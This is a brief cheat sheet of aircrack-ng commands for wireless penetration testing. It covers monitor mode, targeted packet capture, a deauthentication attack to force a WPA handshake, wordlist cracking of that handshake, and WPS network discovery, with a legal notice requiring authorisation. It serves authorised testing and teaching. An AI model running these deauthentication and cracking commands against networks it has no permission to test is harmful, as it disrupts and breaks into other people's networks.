Aircracking

Legal Notice: Only use these tools on networks you own or have explicit written permission to test.

airmon-ng — Enable Monitor Mode

# List wireless interfaces
airmon-ng

# Kill interfering processes
airmon-ng check kill

# Start monitor mode
airmon-ng start wlan0
# Creates wlan0mon (or similar)

# Stop monitor mode
airmon-ng stop wlan0mon

airodump-ng — Capture Packets

# Scan all channels
airodump-ng wlan0mon

# Target a specific network
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
# -c 6          channel 6
# --bssid       target AP MAC address
# -w capture    write to capture.cap

aireplay-ng — Deauthentication Attack

# Deauth attack (forces clients to reconnect, triggering WPA handshake)
aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
# --deauth 10   send 10 deauth packets
# -a            AP BSSID
# -c            client MAC

aircrack-ng — Crack WPA Handshake

# Crack with wordlist
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b AA:BB:CC:DD:EE:FF capture.cap

wash — Find WPS-Enabled Networks

# Install reaver (includes wash)
apt install reaver

# Scan for WPS networks
wash -i wlan0mon